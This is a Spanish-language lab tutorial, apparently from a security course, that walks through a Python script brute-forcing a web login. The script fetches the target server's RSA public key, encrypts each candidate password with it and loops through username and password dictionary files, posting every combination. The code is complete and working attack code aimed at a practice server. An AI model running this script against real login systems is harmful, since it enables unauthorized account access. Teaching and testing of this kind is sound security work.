# **LABORATORIO 4 - ATAQUE DE FUERZA BRUTA CON CRIPTOGRAFÍA**

 

En el siguiente laboratorio se creará un código en Python que permite realizar múltiples intentos de autenticación sobre una aplicación Web de manera automatizada, cifrando la contraseña utilizada a partir de la llave pública del servidor objetivo. Para llevar a cabo este procedimiento, se utilizarán conceptos y herramientas aplicadas en el laboratorio previo   “LABORATORIO4_FUERZA_BRUTA”.

De manera general, en este laboratorio se generará una función llamada `make_login_request`, la cual, se encargará de realizar peticiones al servidor objetivo con un usuario y una contraseña hasta lograr comprometerlo. Posteriormente, se hará uso de un ciclo para recorrer los archivos de usuarios y contraseñas en su totalidad utilizando la función creada previamente.

> Cabe resaltar que en este ejercicio se obtendrá la llave pública del servidor a atacar con el fin de cifrar las contraseñas que se van a probar, a partir de esta llave.  

Como insumos básicos, ya se debe contar con los documentos que contengan los usuarios y las contraseñas que se van a probar, proceso realizado en el Laboratorio 4.  


## Parte 1

Para comenzar y para mantener el documento ordenado, claro y con una fácil interpretación, se creará la librería llamada `cipher.py` en la cual se definirán las funciones que se utilizaran en el programa principal. 

Se importan unas librerías que se necesitan para realizar todo el proceso de cifrado y  seguidamente la codificación de la contraseña a utilizar, como lo son: `Crypto.PublicKey (RSA), Crypto.Cipher (PKCS1_v1_5), base64 (decode, encode,b64encode, b64decode)`. También se importa la librería `request(get)` para lograr obtener la llave pública del servidor víctima. 


``` python
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5
from base64 import decode, encode,b64encode, b64decode
from requests import get
```


Ahora se comienza por definir la función `get_pub_key_from_server` que se encargará de obtener la llave pública del servidor. Por lo tanto, utilizando la función `try - except`, se define la variable `url` con la dirección del sitio web objetivo, también se definen las variables `response` (encargada de almacenar la respuesta de la petición get al servidor) y `public_key` (donde se alojará la llave pública). Finalmente se declara la excepción que se va a utilizar, en este caso se asigna la variable `error` para almacenar el contenido de la causa del error y a su vez procederá a imprimir el error producido en la función print. Esta función retornará la llave pública obtenida.


``` python
def get_pub_key_from_server():
    try:
        url = 'https://Servidor-de-login.josedaviddavi34.repl.co/pubKey'
        response = get(url)
        public_key = response.text
    except Exception as error:
        print('Ocurrió un error al obtener la llave pública del servidor:',error)
        return None
    else:
        return public_key 
```


El siguiente paso es definir una función para almacenar la llave pública obtenida,  la cual se llamará `store_pub_key` y recibirá como parámetro de entrada la variable` public_key. `Nuevamente se utiliza la función `try - except `para dentro de ella hacer uso de la función `with` y escribir una archivo .pem que almacenará la llave pública del servidor.  En este caso también se asigna la variable `error` para almacenar el contenido de la causa del error y a su vez procederá a imprimir el error producido en la función `print`.

La función queda definida de la siguiente manera:


``` python
def store_pub_key(public_key):
    try:
      with open('pubKey.pem','w') as file_pub_key:        
        file_pub_key.write(public_key)
    except Exception as error:
      print('Ocurrió un error al guardar la llave pública:',error)
```


La siguiente función que se va a definir, llamada `get_public_key` , se encargará de obtener la llave pública que se encuentra almacenada en el archivo pubKey.pem y asignarla a la variable `public_key`.  Se inicia utilizando las funciones `try - except` y dentro de ella abriendo el archivo que contiene la llave pública a partir de la función `with`. Seguidamente, se le asigna el contenido del archivo a la variable `public_key`. En este caso también se asigna la variable `error` para almacenar el contenido de la causa del error y a su vez procederá a imprimir el error producido en la función `print`. Esta función retornará la llave pública almacenada. 


``` python
def get_public_key():
  try:
    with open('pubKey.pem') as pub_key_file:
      public_key = pub_key_file.read()
  except Exception as error:
    print('Ocurrio un error inesperado:', error)
    return None, None
  else:
    return public_key
```


La última función a definir es `encrypt_message` que tendrá como parámetro de entrada el password que se va a utilizar. Esta función se encarga de codificar y cifrar, utilizando la llave pública del servidor y la contraseña a probar. Para comenzar, como en las funciones anteriores, se utiliza la función `try - except` y se define la variable `message`, esta variable almacenará la contraseña con la cual se va trabajar. Posteriormente, se procede a codificar `message`. Ahora se define la variable `recipient_key` y `cipher`,  la primera  tiene el objeto que obtiene al importar la llave y la segunda instancia un segundo objeto pero esta vez con las funciones de cifrado. Ahora bien, para finalizar se define la variable `ciphertext` que se encarga de almacenar el objeto resultante de cifrar la contraseña utilizando la llave pública del servidor para finalmente obtener el text, que es donde se almacena la contraseña codificada y cifrada y se enviará al servidor objetivo. En este caso también se asigna la variable `error` para almacenar el contenido de la causa del error y a su vez procederá a imprimir el error producido en la función `print`. Esta función retornará el texto que se va a enviar al servidor.


``` python
def encrypt_message(password):
    try: 
        message = str(password)
        message = message.encode("utf-8")
        recipient_key = RSA.import_key(get_public_key())
        cipher = PKCS1_v1_5.new(recipient_key)
        ciphertext = cipher.encrypt(message)
        text = b64encode(ciphertext).decode()
        return text
    except Exception as error:
        print('Ocurrió un error al cifrar el dato', error)
        return None
```



## Parte 2

En nuestro archivo principal se importaran las funciones requeridas desde la libreria `cypher.py`, así como la libreria `post`.


``` python
from requests import post
from cipher import encrypt_message, get_pub_key_from_server, store_pub_key
```


Se realiza un llamado a la función `store_pub_key`, la cual recibe como parámetro la llave pública obtenida por el método `get_pub_key_from_server`:


``` python
store_pub_key(get_pub_key_from_server())
```


De esta manera se tiene la llave pública almacenada localmente para ser usada en el cifrado de la contraseña en cada petición de autenticación.

A continuación se reutiliza la función `make_login_request` del laboratorio 4, con la modificación en la definición del password, donde se llamará a la función `encrypt_message` para proceder a enviar el password cifrado. 

 


``` python
def make_login_request(username, password):
    try:
        url = 'https://Servidor-de-login.josedaviddavi34.repl.co/login'
        body = {
            'username': username,
            'password': encrypt_message(password)
        }
        response = post(url, json=body)
        print ("intentando con el usuario",username, "y la contraseña:",password)
        print('response es:', response.json())
    except Exception as error:
        print('Ocurrio al realizar la petición de login en el servidor:',error)
```



Posteriormente se reutiliza el ciclo que genera las peticiones al servidor y llama a la función `make_login_request`


``` python
#ciclo para generar varias peticiones al servidor iterando cada contraseña
with open('dic_users.txt') as users:
    reader_users = users.readlines()
    with open('dic_passwords.txt') as passwords:
        reader_passwords = passwords.readlines()
        for user in reader_users:
            for password in reader_passwords:
                user = user.replace("\n","")
                password = password.replace("\n","")
                password = password.replace(" ","") 
                make_login_request(user, password)
```

